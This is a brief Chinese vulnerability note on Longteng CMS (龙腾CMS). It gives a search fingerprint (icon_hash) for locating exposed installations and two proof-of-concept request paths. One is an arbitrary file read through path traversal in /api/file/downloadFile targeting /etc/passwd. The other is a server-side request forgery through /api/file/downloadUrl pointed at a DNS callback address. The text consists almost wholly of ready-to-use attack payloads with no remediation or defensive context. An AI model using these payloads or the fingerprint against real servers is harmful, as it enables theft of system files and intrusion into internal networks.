龙腾CMS存在downloadUrl SSRF漏洞，downloadFile任意文件读取漏洞

网络测绘 icon_hash="-803002403"

downloadfile

漏洞poc

地址/api/file/downloadFile?file=../../../../../../../../../../../../../../../../../etc/passwd

或者不使用抓包，访问该地址会直接下载一个文件

downloadurl

漏洞poc

地址/api/file/downloadUrl?file=http://dns地址